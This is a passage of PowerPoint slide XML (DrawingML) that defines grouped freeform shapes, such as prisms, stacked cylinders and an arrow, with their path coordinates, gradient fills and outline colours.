                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 149"/>
                      <a:gd name="T1" fmla="*/ 461 h 461"/>
                      <a:gd name="T2" fmla="*/ 149 w 149"/>
                      <a:gd name="T3" fmla="*/ 420 h 461"/>
                      <a:gd name="T4" fmla="*/ 149 w 149"/>
                      <a:gd name="T5" fmla="*/ 0 h 461"/>
                      <a:gd name="T6" fmla="*/ 0 w 149"/>
                      <a:gd name="T7" fmla="*/ 38 h 461"/>
                      <a:gd name="T8" fmla="*/ 0 w 149"/>
                      <a:gd name="T9" fmla="*/ 461 h 4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9" h="461">
                        <a:moveTo>
                          <a:pt x="0" y="461"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="149" y="420"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="149" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="38"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="461"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF6B21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33" name="Group 735"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3141" y="1875"/>
                  <a:ext cx="67" cy="66"/>
                  <a:chOff x="3829" y="1553"/>
                  <a:chExt cx="74" cy="74"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="237" name="Freeform 736"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3829" y="1553"/>
                    <a:ext cx="74" cy="20"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 421 w 570"/>
                      <a:gd name="T1" fmla="*/ 156 h 156"/>
                      <a:gd name="T2" fmla="*/ 570 w 570"/>
                      <a:gd name="T3" fmla="*/ 116 h 156"/>
                      <a:gd name="T4" fmla="*/ 149 w 570"/>
                      <a:gd name="T5" fmla="*/ 0 h 156"/>
                      <a:gd name="T6" fmla="*/ 0 w 570"/>
                      <a:gd name="T7" fmla="*/ 40 h 156"/>
                      <a:gd name="T8" fmla="*/ 421 w 570"/>
                      <a:gd name="T9" fmla="*/ 156 h 1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0" h="156">
                        <a:moveTo>
                          <a:pt x="421" y="156"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="570" y="116"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="149" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="40"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="421" y="156"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF6B21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8" name="Freeform 737"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3829" y="1558"/>
                    <a:ext cx="55" cy="69"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 421 w 421"/>
                      <a:gd name="T1" fmla="*/ 537 h 537"/>
                      <a:gd name="T2" fmla="*/ 421 w 421"/>
                      <a:gd name="T3" fmla="*/ 116 h 537"/>
                      <a:gd name="T4" fmla="*/ 0 w 421"/>
                      <a:gd name="T5" fmla="*/ 0 h 537"/>
                      <a:gd name="T6" fmla="*/ 0 w 421"/>
                      <a:gd name="T7" fmla="*/ 421 h 537"/>
                      <a:gd name="T8" fmla="*/ 421 w 421"/>
                      <a:gd name="T9" fmla="*/ 537 h 5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21" h="537">
                        <a:moveTo>
                          <a:pt x="421" y="537"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="421" y="116"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="421"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="421" y="537"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF9966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9" name="Freeform 738"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3884" y="1568"/>
                    <a:ext cx="19" cy="59"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 149"/>
                      <a:gd name="T1" fmla="*/ 461 h 461"/>
                      <a:gd name="T2" fmla="*/ 149 w 149"/>
                      <a:gd name="T3" fmla="*/ 420 h 461"/>
                      <a:gd name="T4" fmla="*/ 149 w 149"/>
                      <a:gd name="T5" fmla="*/ 0 h 461"/>
                      <a:gd name="T6" fmla="*/ 0 w 149"/>
                      <a:gd name="T7" fmla="*/ 38 h 461"/>
                      <a:gd name="T8" fmla="*/ 0 w 149"/>
                      <a:gd name="T9" fmla="*/ 461 h 4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9" h="461">
                        <a:moveTo>
                          <a:pt x="0" y="461"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="149" y="420"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="149" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="38"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="461"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF6B21"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF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34" name="Freeform 740"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3190" y="1888"/>
                  <a:ext cx="66" cy="18"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 421 w 570"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 570 w 570"/>
                    <a:gd name="T3" fmla="*/ 116 h 156"/>
                    <a:gd name="T4" fmla="*/ 149 w 570"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 0 w 570"/>
                    <a:gd name="T7" fmla="*/ 40 h 156"/>
                    <a:gd name="T8" fmla="*/ 421 w 570"/>
                    <a:gd name="T9" fmla="*/ 156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0" h="156">
                      <a:moveTo>
                        <a:pt x="421" y="156"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="570" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="149" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="40"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="421" y="156"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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35" name="Freeform 741"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3190" y="1892"/>
                  <a:ext cx="49" cy="62"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 421 w 421"/>
                    <a:gd name="T1" fmla="*/ 537 h 537"/>
                    <a:gd name="T2" fmla="*/ 421 w 421"/>
                    <a:gd name="T3" fmla="*/ 116 h 537"/>
                    <a:gd name="T4" fmla="*/ 0 w 421"/>
                    <a:gd name="T5" fmla="*/ 0 h 537"/>
                    <a:gd name="T6" fmla="*/ 0 w 421"/>
                    <a:gd name="T7" fmla="*/ 421 h 537"/>
                    <a:gd name="T8" fmla="*/ 421 w 421"/>
                    <a:gd name="T9" fmla="*/ 537 h 5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21" h="537">
                      <a:moveTo>
                        <a:pt x="421" y="537"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="421" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="421"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="421" y="537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719"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3238" y="1893"/>
                  <a:ext cx="22" cy="238"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 149"/>
                    <a:gd name="T1" fmla="*/ 1599 h 1639"/>
                    <a:gd name="T2" fmla="*/ 149 w 149"/>
                    <a:gd name="T3" fmla="*/ 1639 h 1639"/>
                    <a:gd name="T4" fmla="*/ 149 w 149"/>
                    <a:gd name="T5" fmla="*/ 38 h 1639"/>
                    <a:gd name="T6" fmla="*/ 0 w 149"/>
                    <a:gd name="T7" fmla="*/ 0 h 1639"/>
                    <a:gd name="T8" fmla="*/ 0 w 149"/>
                    <a:gd name="T9" fmla="*/ 1599 h 16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9" h="1639">
                      <a:moveTo>
                        <a:pt x="0" y="1599"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="149" y="1639"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="149" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1599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5" name="Group 1046"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3612" y="1704"/>
                <a:ext cx="117" cy="299"/>
                <a:chOff x="3612" y="1704"/>
                <a:chExt cx="117" cy="299"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="167" name="Freeform 1712"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3612" y="1720"/>
                  <a:ext cx="117" cy="77"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 681"/>
                    <a:gd name="T1" fmla="*/ 0 h 453"/>
                    <a:gd name="T2" fmla="*/ 0 w 681"/>
                    <a:gd name="T3" fmla="*/ 338 h 453"/>
                    <a:gd name="T4" fmla="*/ 0 w 681"/>
                    <a:gd name="T5" fmla="*/ 380 h 453"/>
                    <a:gd name="T6" fmla="*/ 340 w 681"/>
                    <a:gd name="T7" fmla="*/ 453 h 453"/>
                    <a:gd name="T8" fmla="*/ 681 w 681"/>
                    <a:gd name="T9" fmla="*/ 380 h 453"/>
                    <a:gd name="T10" fmla="*/ 681 w 681"/>
                    <a:gd name="T11" fmla="*/ 338 h 453"/>
                    <a:gd name="T12" fmla="*/ 681 w 681"/>
                    <a:gd name="T13" fmla="*/ 0 h 453"/>
                    <a:gd name="T14" fmla="*/ 0 w 681"/>
                    <a:gd name="T15" fmla="*/ 0 h 45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681"/>
                    <a:gd name="T25" fmla="*/ 0 h 453"/>
                    <a:gd name="T26" fmla="*/ 681 w 681"/>
                    <a:gd name="T27" fmla="*/ 453 h 453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681" h="453">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="338"/>
                        <a:pt x="0" y="338"/>
                        <a:pt x="0" y="338"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="380"/>
                        <a:pt x="0" y="380"/>
                        <a:pt x="0" y="380"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="422"/>
                        <a:pt x="174" y="453"/>
                        <a:pt x="340" y="453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="507" y="453"/>
                        <a:pt x="646" y="422"/>
                        <a:pt x="681" y="380"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="681" y="338"/>
                        <a:pt x="681" y="338"/>
                        <a:pt x="681" y="338"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="681" y="0"/>
                        <a:pt x="681" y="0"/>
                        <a:pt x="68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FF9966"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="FF9966">
                        <a:gamma/>
                        <a:tint val="82745"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FF9966"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="0" scaled="1"/>
                </a:gradFill>
                <a:ln w="6350">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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8" name="Freeform 1713"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3612" y="1785"/>
                  <a:ext cx="117" cy="81"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 340 w 681"/>
                    <a:gd name="T1" fmla="*/ 73 h 473"/>
                    <a:gd name="T2" fmla="*/ 0 w 681"/>
                    <a:gd name="T3" fmla="*/ 0 h 473"/>
                    <a:gd name="T4" fmla="*/ 0 w 681"/>
                    <a:gd name="T5" fmla="*/ 358 h 473"/>
                    <a:gd name="T6" fmla="*/ 0 w 681"/>
                    <a:gd name="T7" fmla="*/ 400 h 473"/>
                    <a:gd name="T8" fmla="*/ 340 w 681"/>
                    <a:gd name="T9" fmla="*/ 473 h 473"/>
                    <a:gd name="T10" fmla="*/ 681 w 681"/>
                    <a:gd name="T11" fmla="*/ 400 h 473"/>
                    <a:gd name="T12" fmla="*/ 681 w 681"/>
                    <a:gd name="T13" fmla="*/ 358 h 473"/>
                    <a:gd name="T14" fmla="*/ 681 w 681"/>
                    <a:gd name="T15" fmla="*/ 0 h 473"/>
                    <a:gd name="T16" fmla="*/ 340 w 681"/>
                    <a:gd name="T17" fmla="*/ 73 h 47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681"/>
                    <a:gd name="T28" fmla="*/ 0 h 473"/>
                    <a:gd name="T29" fmla="*/ 681 w 681"/>
                    <a:gd name="T30" fmla="*/ 473 h 473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681" h="473">
                      <a:moveTo>
                        <a:pt x="340" y="73"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="174" y="73"/>
                        <a:pt x="35" y="42"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="358"/>
                        <a:pt x="0" y="358"/>
                        <a:pt x="0" y="358"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="400"/>
                        <a:pt x="0" y="400"/>
                        <a:pt x="0" y="400"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="442"/>
                        <a:pt x="174" y="473"/>
                        <a:pt x="340" y="473"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="507" y="473"/>
                        <a:pt x="646" y="442"/>
                        <a:pt x="681" y="400"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="681" y="358"/>
                        <a:pt x="681" y="358"/>
                        <a:pt x="681" y="358"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="681" y="0"/>
                        <a:pt x="681" y="0"/>
                        <a:pt x="681" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="646" y="42"/>
                        <a:pt x="507" y="73"/>
                        <a:pt x="340" y="7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9966"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="FF9966">
                        <a:gamma/>
                        <a:tint val="82745"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FF9966"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="0" scaled="1"/>
                </a:gradFill>
                <a:ln w="6350">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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9" name="Freeform 1714"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3612" y="1853"/>
                  <a:ext cx="117" cy="81"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 340 w 681"/>
                    <a:gd name="T1" fmla="*/ 73 h 473"/>
                    <a:gd name="T2" fmla="*/ 0 w 681"/>
                    <a:gd name="T3" fmla="*/ 0 h 473"/>
                    <a:gd name="T4" fmla="*/ 0 w 681"/>
                    <a:gd name="T5" fmla="*/ 358 h 473"/>
                    <a:gd name="T6" fmla="*/ 0 w 681"/>
                    <a:gd name="T7" fmla="*/ 400 h 473"/>
                    <a:gd name="T8" fmla="*/ 340 w 681"/>
                    <a:gd name="T9" fmla="*/ 473 h 473"/>
                    <a:gd name="T10" fmla="*/ 681 w 681"/>
                    <a:gd name="T11" fmla="*/ 400 h 473"/>
                    <a:gd name="T12" fmla="*/ 681 w 681"/>
                    <a:gd name="T13" fmla="*/ 358 h 473"/>
                    <a:gd name="T14" fmla="*/ 681 w 681"/>
                    <a:gd name="T15" fmla="*/ 0 h 473"/>
                    <a:gd name="T16" fmla="*/ 340 w 681"/>
                    <a:gd name="T17" fmla="*/ 73 h 47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681"/>
                    <a:gd name="T28" fmla="*/ 0 h 473"/>
                    <a:gd name="T29" fmla="*/ 681 w 681"/>
                    <a:gd name="T30" fmla="*/ 473 h 473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681" h="473">
                      <a:moveTo>
                        <a:pt x="340" y="73"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="174" y="73"/>
                        <a:pt x="35" y="42"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="358"/>
                        <a:pt x="0" y="358"/>
                        <a:pt x="0" y="358"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="400"/>
                        <a:pt x="0" y="400"/>
                        <a:pt x="0" y="400"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="442"/>
                        <a:pt x="174" y="473"/>
                        <a:pt x="340" y="473"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="507" y="473"/>
                        <a:pt x="646" y="442"/>
                        <a:pt x="681" y="400"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="681" y="358"/>
                        <a:pt x="681" y="358"/>
                        <a:pt x="681" y="358"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="681" y="0"/>
                        <a:pt x="681" y="0"/>
                        <a:pt x="681" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="646" y="42"/>
                        <a:pt x="507" y="73"/>
                        <a:pt x="340" y="7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9966"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="FF9966">
                        <a:gamma/>
                        <a:tint val="82745"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FF9966"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="0" scaled="1"/>
                </a:gradFill>
                <a:ln w="6350">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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0" name="Freeform 1715"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3612" y="1922"/>
                  <a:ext cx="117" cy="81"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 340 w 681"/>
                    <a:gd name="T1" fmla="*/ 73 h 473"/>
                    <a:gd name="T2" fmla="*/ 0 w 681"/>
                    <a:gd name="T3" fmla="*/ 0 h 473"/>
                    <a:gd name="T4" fmla="*/ 0 w 681"/>
                    <a:gd name="T5" fmla="*/ 358 h 473"/>
                    <a:gd name="T6" fmla="*/ 0 w 681"/>
                    <a:gd name="T7" fmla="*/ 400 h 473"/>
                    <a:gd name="T8" fmla="*/ 340 w 681"/>
                    <a:gd name="T9" fmla="*/ 473 h 473"/>
                    <a:gd name="T10" fmla="*/ 681 w 681"/>
                    <a:gd name="T11" fmla="*/ 400 h 473"/>
                    <a:gd name="T12" fmla="*/ 681 w 681"/>
                    <a:gd name="T13" fmla="*/ 358 h 473"/>
                    <a:gd name="T14" fmla="*/ 681 w 681"/>
                    <a:gd name="T15" fmla="*/ 0 h 473"/>
                    <a:gd name="T16" fmla="*/ 340 w 681"/>
                    <a:gd name="T17" fmla="*/ 73 h 47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681"/>
                    <a:gd name="T28" fmla="*/ 0 h 473"/>
                    <a:gd name="T29" fmla="*/ 681 w 681"/>
                    <a:gd name="T30" fmla="*/ 473 h 473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681" h="473">
                      <a:moveTo>
                        <a:pt x="340" y="73"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="174" y="73"/>
                        <a:pt x="35" y="42"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="358"/>
                        <a:pt x="0" y="358"/>
                        <a:pt x="0" y="358"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="400"/>
                        <a:pt x="0" y="400"/>
                        <a:pt x="0" y="400"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="441"/>
                        <a:pt x="174" y="473"/>
                        <a:pt x="340" y="473"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="507" y="473"/>
                        <a:pt x="646" y="441"/>
                        <a:pt x="681" y="400"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="681" y="358"/>
                        <a:pt x="681" y="358"/>
                        <a:pt x="681" y="358"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="681" y="0"/>
                        <a:pt x="681" y="0"/>
                        <a:pt x="681" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="646" y="42"/>
                        <a:pt x="507" y="73"/>
                        <a:pt x="340" y="7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9966"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="FF9966">
                        <a:gamma/>
                        <a:tint val="82745"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FF9966"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="0" scaled="1"/>
                </a:gradFill>
                <a:ln w="6350">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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Oval 1719"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3612" y="1704"/>
                  <a:ext cx="117" cy="31"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21"/>
                </a:solidFill>
                <a:ln w="6350" algn="ctr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6" name="Group 872"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3217" y="1894"/>
                <a:ext cx="471" cy="280"/>
                <a:chOff x="4200" y="-480"/>
                <a:chExt cx="3681" cy="2191"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="87" name="Freeform 873"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4463" y="737"/>
                  <a:ext cx="840" cy="321"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1739"/>
                    <a:gd name="T1" fmla="*/ 0 h 664"/>
                    <a:gd name="T2" fmla="*/ 0 w 1739"/>
                    <a:gd name="T3" fmla="*/ 198 h 664"/>
                    <a:gd name="T4" fmla="*/ 1739 w 1739"/>
                    <a:gd name="T5" fmla="*/ 664 h 664"/>
                    <a:gd name="T6" fmla="*/ 1739 w 1739"/>
                    <a:gd name="T7" fmla="*/ 465 h 664"/>
                    <a:gd name="T8" fmla="*/ 0 w 1739"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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39" h="664">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="198"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1739" y="664"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1739" y="46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 874"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4463" y="620"/>
                  <a:ext cx="1273" cy="341"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1739 w 2634"/>
                    <a:gd name="T1" fmla="*/ 227 h 706"/>
                    <a:gd name="T2" fmla="*/ 898 w 2634"/>
                    <a:gd name="T3" fmla="*/ 0 h 706"/>
                    <a:gd name="T4" fmla="*/ 0 w 2634"/>
                    <a:gd name="T5" fmla="*/ 241 h 706"/>
                    <a:gd name="T6" fmla="*/ 844 w 2634"/>
                    <a:gd name="T7" fmla="*/ 468 h 706"/>
                    <a:gd name="T8" fmla="*/ 844 w 2634"/>
                    <a:gd name="T9" fmla="*/ 468 h 706"/>
                    <a:gd name="T10" fmla="*/ 1739 w 2634"/>
                    <a:gd name="T11" fmla="*/ 706 h 706"/>
                    <a:gd name="T12" fmla="*/ 2634 w 2634"/>
                    <a:gd name="T13" fmla="*/ 468 h 706"/>
                    <a:gd name="T14" fmla="*/ 1739 w 2634"/>
                    <a:gd name="T15" fmla="*/ 227 h 7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634" h="706">
                      <a:moveTo>
                        <a:pt x="1739" y="227"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="898" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="844" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="844" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1739" y="706"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2634" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1739" y="22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 875"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4412" y="707"/>
                  <a:ext cx="345" cy="380"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 241 w 302"/>
                    <a:gd name="T1" fmla="*/ 96 h 333"/>
                    <a:gd name="T2" fmla="*/ 66 w 302"/>
                    <a:gd name="T3" fmla="*/ 21 h 333"/>
                    <a:gd name="T4" fmla="*/ 66 w 302"/>
                    <a:gd name="T5" fmla="*/ 21 h 333"/>
                    <a:gd name="T6" fmla="*/ 17 w 302"/>
                    <a:gd name="T7" fmla="*/ 34 h 333"/>
                    <a:gd name="T8" fmla="*/ 26 w 302"/>
                    <a:gd name="T9" fmla="*/ 55 h 333"/>
                    <a:gd name="T10" fmla="*/ 58 w 302"/>
                    <a:gd name="T11" fmla="*/ 236 h 333"/>
                    <a:gd name="T12" fmla="*/ 143 w 302"/>
                    <a:gd name="T13" fmla="*/ 305 h 333"/>
                    <a:gd name="T14" fmla="*/ 156 w 302"/>
                    <a:gd name="T15" fmla="*/ 333 h 333"/>
                    <a:gd name="T16" fmla="*/ 221 w 302"/>
                    <a:gd name="T17" fmla="*/ 315 h 333"/>
                    <a:gd name="T18" fmla="*/ 221 w 302"/>
                    <a:gd name="T19" fmla="*/ 315 h 333"/>
                    <a:gd name="T20" fmla="*/ 252 w 302"/>
                    <a:gd name="T21" fmla="*/ 301 h 333"/>
